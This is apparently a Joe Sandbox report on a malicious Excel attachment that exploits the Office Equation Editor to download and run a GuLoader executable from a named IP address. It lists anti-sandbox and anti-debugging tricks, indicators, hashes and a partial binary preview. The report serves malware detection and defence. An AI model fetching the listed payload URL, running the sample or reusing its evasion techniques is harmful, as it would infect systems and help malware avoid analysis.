Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D491A NtWriteVirtualMemory,	6_2_003D491A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D73 NtWriteVirtualMemory,	6_2_003D4D73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D49BB NtWriteVirtualMemory,	6_2_003D49BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4DAB NtWriteVirtualMemory,	6_2_003D4DAB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D95 NtWriteVirtualMemory,	6_2_003D4D95
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D89 NtWriteVirtualMemory,	6_2_003D4D89
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5D81 NtAllocateVirtualMemory,	6_2_003D5D81
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D51F3 NtWriteVirtualMemory,	6_2_003D51F3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5CD5 NtAllocateVirtualMemory,	9_2_001B5CD5
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5E07 NtAllocateVirtualMemory,	9_2_001B5E07
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5D30 NtAllocateVirtualMemory,	9_2_001B5D30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5D81 NtAllocateVirtualMemory,	9_2_001B5D81

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	Virustotal: Detection: 38%
Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	ReversingLabs: Detection: 28%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR212.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/21@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405852 push ebx; ret	6_2_00405854
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004072B2 push cs; iretd	6_2_004072D0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040796C push ecx; iretd	6_2_00407985
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040772B push es; iretd	6_2_0040772C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004075F1 push ebx; iretd	6_2_00407601
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D1077 push 0BFD29CAh; retf FD29h	6_2_003D10F2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003DA563 push edx; retf	6_2_003DA569
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8BA0 push edx; retf	6_2_003D8BAB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B843D push es; ret	9_2_001B843E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B15B3 push ebp; iretd	9_2_001B15B6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BA0 push edx; retf	9_2_001B8BAB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 000000000040C090 second address: 000000000040C090 instructions: 0x00000000 rdtsc 0x00000002 cmp al, FEh 0x00000004 xor eax, edx 0x00000006 cmp esi, 00000097h 0x0000000c dec edi 0x0000000d cmp di, 00EFh 0x00000012 movq mm7, mm5 0x00000015 jmp 00007F6370A86402h 0x00000017 cmp edi, 00000000h 0x0000001a jne 00007F6370A86328h 0x00000020 cmp bh, 00000057h 0x00000023 mov ebx, 42152221h 0x00000028 cmp dl, FFFFFF80h 0x0000002b xor ebx, DC00070Fh 0x00000031 cmp bh, 00000023h 0x00000034 add ebx, 289BD3ABh 0x0000003a cmp edx, 14h 0x0000003d psubw xmm6, xmm7 0x00000041 jmp 00007F6370A86401h 0x00000043 sub ebx, C670F8D9h 0x00000049 cmp esi, 5Eh 0x0000004c cmp bh, 00000021h 0x0000004f rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 760

Thread sleep time: -360000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003D8304 rdtsc

6_2_003D8304

Source: C:\Users\Public\vbc.exe

Window / User API: threadDelayed 9848

Jump to behavior

Source: C:\Users\Public\vbc.exe

System information queried: ModuleInformation

Jump to behavior

Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\Public\vbc.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003D8304 rdtsc

6_2_003D8304

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C0F mov eax, dword ptr fs:[00000030h]	6_2_003D8C0F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C73 mov eax, dword ptr fs:[00000030h]	6_2_003D8C73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3A50 mov eax, dword ptr fs:[00000030h]	6_2_003D3A50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D58BB mov eax, dword ptr fs:[00000030h]	6_2_003D58BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3AB1 mov eax, dword ptr fs:[00000030h]	6_2_003D3AB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D788C mov eax, dword ptr fs:[00000030h]	6_2_003D788C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D788F mov eax, dword ptr fs:[00000030h]	6_2_003D788F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D7ECE mov eax, dword ptr fs:[00000030h]	6_2_003D7ECE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D39AB mov eax, dword ptr fs:[00000030h]	6_2_003D39AB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2F96 mov eax, dword ptr fs:[00000030h]	6_2_003D2F96
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5837 mov eax, dword ptr fs:[00000030h]	9_2_001B5837
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8C73 mov eax, dword ptr fs:[00000030h]	9_2_001B8C73
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B788F mov eax, dword ptr fs:[00000030h]	9_2_001B788F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B788C mov eax, dword ptr fs:[00000030h]	9_2_001B788C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7ECE mov eax, dword ptr fs:[00000030h]	9_2_001B7ECE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BAC mov eax, dword ptr fs:[00000030h]	9_2_001B8BAC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BFF mov eax, dword ptr fs:[00000030h]	9_2_001B8BFF

Source: C:\Users\Public\vbc.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003D60CF LdrInitializeThunk,

6_2_003D60CF

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior

Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Path Interception	Process Injection12	Masquerading111	OS Credential Dumping	Security Software Discovery521	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Disable or Modify Tools1	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion22	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection12	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol121	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Extra Window Memory Injection1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	39%	Virustotal		Browse
#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	29%	ReversingLabs	Document-OLE.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	36%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	21%	ReversingLabs	Win32.Trojan.Vebzenpak
C:\Users\Public\vbc.exe	36%	Virustotal		Browse
C:\Users\Public\vbc.exe	21%	ReversingLabs	Win32.Trojan.Vebzenpak

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://23.95.85.181/0789/vbc.exe	6%	Virustotal		Browse
http://23.95.85.181/0789/vbc.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.95.85.181/0789/vbc.exe	true	6%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	false		high
http://www.icra.org/vocabulary/.	vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.day.com/dam/1.0	EA784B99.emf.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.95.85.181	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483661
Start date:	15.09.2021
Start time:	11:05:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@6/21@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 26.8% (good quality ratio 14.3%) Quality average: 34.4% Quality standard deviation: 37.7%
HCA Information:	Successful, ratio: 61% Number of executed functions: 74 Number of non-executed functions: 32
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:06:49	API Interceptor	40x Sleep call for process: EQNEDT32.EXE modified
11:08:09	API Interceptor	6x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
23.95.85.181	ORDER RFQ1009202.xlsx	Get hash	malicious	Browse	23.95.85.181/msn/vbc.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	09142021_PDF.vbs	Get hash	malicious	Browse	23.94.82.41
	Swift Mt103.xlsx	Get hash	malicious	Browse	23.95.13.175
	vkb.xlsx	Get hash	malicious	Browse	192.3.13.11
	Transfer Swift.xlsx	Get hash	malicious	Browse	172.245.26.190
	ORDER 5172020.xlsx	Get hash	malicious	Browse	198.12.84.109
	REF_MIDLGB34.xlsx	Get hash	malicious	Browse	23.94.159.208
	proforma invoice.xlsx	Get hash	malicious	Browse	192.3.141.149
	Swift_Mt103.xlsx	Get hash	malicious	Browse	23.95.13.175
	PO-80722 .xlsx	Get hash	malicious	Browse	198.12.84.109
	MT103-Swift Copy.xlsx	Get hash	malicious	Browse	198.46.199.203
	Items_quote.xlsx	Get hash	malicious	Browse	172.245.26.145
	Usd_transfer.xlsx	Get hash	malicious	Browse	172.245.26.145
	REF_MIDLGB34.xlsx	Get hash	malicious	Browse	23.94.159.208
	ORDER RFQ1009202.xlsx	Get hash	malicious	Browse	23.95.85.181
	msn.xlsx	Get hash	malicious	Browse	198.12.127.217
	swift.xlsx	Get hash	malicious	Browse	198.46.199.171
	Additional Order Qty 197.xlsx	Get hash	malicious	Browse	198.12.107.117
	DHL Cargo Arrival.xlsx	Get hash	malicious	Browse	172.245.26.190
	Po2142021.xlsx	Get hash	malicious	Browse	198.12.107.117
	UPDATED SOA - JUNE & JUULY & AUGUST.xlsx	Get hash	malicious	Browse	192.3.146.254

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	122880
Entropy (8bit):	6.286624517223784
Encrypted:	false
SSDEEP:	1536:yzqGcUKFGnMrpxAcbsasHpL9T8oOmhfIRorEjZyZt:fcnM1rQa2dRPrEtyZt
MD5:	451E4CD68C69C2C8B8FC93AD02E8754A
SHA1:	B87D041383FA59A21BFF9666756EFA2784282199
SHA-256:	E406C6674E19F2F3368E26AD4E6D672B190EA5DF8CB1B5E95C9E22FB8C80738B
SHA-512:	FE42A6AFBD37EC5D20EC0C22153489EE0CA4A636FE8312DBF9554BEBE7C6D3D0E9AD602C3A746304F150561650FB2A887CFC10B3AD727A2FAB0A72A5A9D11911
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 36%, Browse Antivirus: ReversingLabs, Detection: 21%
Reputation:	low
IE Cache URL:	http://23.95.85.181/0789/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......K.....................@....................@.................................`u......................................$...(...........................................................................(... .......L............................text...`........................... ..`.data...............................@....rsrc............ ..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A0B8B0A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F521389.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30D76811.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Reputation:	moderate, very likely benign file
